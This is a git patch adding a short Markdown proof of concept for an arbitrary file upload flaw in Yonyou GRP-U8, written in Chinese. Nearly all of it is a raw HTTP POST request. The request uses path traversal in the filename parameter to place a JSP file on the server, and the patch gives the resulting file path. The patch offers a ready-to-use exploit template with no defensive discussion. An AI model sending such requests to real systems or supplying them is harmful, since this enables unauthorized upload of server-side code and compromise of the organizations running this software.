From d592a823eaeaeac0eb7906e1c34f8110db91d87f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 21:09:54 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BGRP-U8-UploadFileDat?=
 =?UTF-8?q?a=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 用友GRP-U8-UploadFileData任意文件上传.md | 34 ++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 用友GRP-U8-UploadFileData任意文件上传.md

diff --git a/用友GRP-U8-UploadFileData任意文件上传.md b/用友GRP-U8-UploadFileData任意文件上传.md
new file mode 100644
index 0000000..b396ecf
--- /dev/null
+++ b/用友GRP-U8-UploadFileData任意文件上传.md
@@ -0,0 +1,34 @@
+## 用友GRP-U8-UploadFileData任意文件上传
+
+
+## poc
+```
+POST /UploadFileData?action=upload_file&filename=../.jtstpm.jsp HTTP/1.0
+Host: xxxxxx
+Connection: close
+Content-Length: 327
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzassocxz
+Cookie: JSESSIONID=0333BDE70A73627168772D5C50956A74
+Dfpajaxreq: 1.0
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="upload"; filename="jtstpm.jsp"
+Content-Type: application/octet-stream
+
+11111
+------WebKitFormBoundaryzassocxz
+Content-Disposition: form-data; name="submit"
+
+submit
+------WebKitFormBoundaryzassocxz--
+```
+
+文件路径 /R9iPortal/jtstpm.jsp